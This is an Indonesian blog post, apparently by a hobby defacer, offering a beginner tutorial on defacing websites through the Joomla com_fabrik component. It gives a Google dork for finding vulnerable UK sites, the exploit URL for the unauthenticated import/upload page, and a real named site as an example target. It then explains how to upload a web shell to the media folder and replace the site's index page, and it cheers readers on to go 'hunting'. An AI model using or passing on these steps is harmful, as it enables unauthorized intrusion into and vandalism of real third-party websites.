Kamis, 09 Januari 2014

12.09
malam guys kali ane mau berbagi tentang deface hehe
Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)



Oke, untuk yang belum tahu disimak ya :)

Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)

Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher


Langkah2nya :
Buka mbah www.google.com
Masukkan Dorknya tadi
inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?option=com_fabrik&lang=de


Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi
http://www.case-stores.de/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
seperti gambar di bawah ini :




Upload shell ente atau kalo belom punya bisa ambil dari artikel saya :)
untuk mengetahui letak shell nya di mana
www.target.com/media/namashellkamu.php ( itu kalo nama shell ente shell )
dan jika sukses manggil shell nya akan seperti gambar di bawah ini :


  seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)                
       kalo udah gitu tinggal tebas index nya dan ganti make scrip kalian deh :D




dan taraaaaaaaa anda telah berhasil mendeface web tersebut :)


Mudah banget kan??? :)
Oke, selamat berburu....

sekian tutor dari ane untuk deface dengan com_fabrik

0 komentar:

Posting Komentar